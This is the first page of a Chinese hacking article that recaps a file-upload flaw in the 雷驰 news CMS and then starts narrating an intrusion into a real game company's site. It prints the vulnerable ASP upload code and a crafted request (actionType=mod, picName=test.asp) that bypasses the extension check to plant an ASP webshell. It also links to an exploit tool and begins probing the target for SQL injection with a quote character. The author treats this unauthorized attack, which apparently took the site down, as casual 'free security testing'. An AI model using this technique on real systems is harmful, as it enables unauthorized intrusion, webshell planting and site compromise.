|
编辑评语:有句话叫做“天下文章一大抄”,果然害人不浅。我们程序员们也都大力地发扬这一优秀传统,进行天下代码一大抄,结果导致只要一个网站管理系统曝出漏洞,其他的也都难于幸免。更可怕的是,遇到不负责任的程序员,抄了别人的代码不说,还懒得升级。只要看上去貌似,进华夏论坛搜一搜,得,正应了一句话:城门失火,殃及池鱼!哎……
|
历史回顾:
应该是在去年下半年的时候吧,以收集网络源码进行调试、修改、出售为主的雷驰源码“开发”的雷驰新闻发布网站管理系统曝出了一个漏洞,针对的是当时的所有版本。漏洞的成因主要是在admin文件夹下的一个上传文件权限配置不当造成,以下是部分漏洞描述代码:
雷驰新闻发布管理系统漏洞描述:
系统: 雷驰新闻发布管理系统
版本: 当前任何版本
漏洞描述:
1.在admin文件夹下的uploadPic.inc.asp中,没有对访问权限进行限制,任意用户都可以访问到此文件。任意用户都可以使用此文件上传文件到服务器
2 uploadPic.inc.asp中虽然对上传文件的后缀名进行了限制但是可以绕过。请看代码!
if file.FileSize>0 then ''''如果 FileSize > 0 说明有文件数据
''生成图片名字
if actionType= "mod" then
remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
else
if editRemNum<>"" then
remNum = editRemNum
else
Randomize
remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
end if
remFileName = remNum&"_"&(editImageNum+1)&".gif"
end if
file.SaveAs Server.mappath(formPath&remFileName) ''''保存文件
%>
关键的是 if actionType= "mod" then
remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
只要自己构造actionType= "mod" 就可以饶过下面的文件名检测上传ASP文件
构造如下UPL:
http://localhost/leichinews/admin/upload ... ype=mod&picName=test.asp
然后在上传文件里面填要传的图片格式的ASP木马
就可以在uppic目录下上传文件名为test.asp的文件
uppic/test.asp |
漏洞具体信息及讨论结果请登陆华夏论坛:http://bbs.77169.com/read-htm-tid-177063.html
漏洞利用工具下载:http://bbs.77169.com/read-htm-tid-189050.html
本文在一次入侵过程中,偶然又遇到了这个程序的后台管理程序,结果,一个挺不错的游戏公司网站就此夭折…… |
一:无意插柳
今天无意打开了一个网站,是”XXXX游戏产业研究中心”界面比较清爽。正好也没什么事,就来给它做个免费安全检测吧,挣不到票子就算是顺便学习下吧,目标网站: http://www.XXXX.net/, 如图1:
(图1)
二:手到擒来
1.发现注入点:在首页的“第一动态”版块下随便点一个新闻链接。习惯性在参数后加个’,结果如图2:
(图2)
[1] [2] [3] [4] [5] [6] 下一页 |
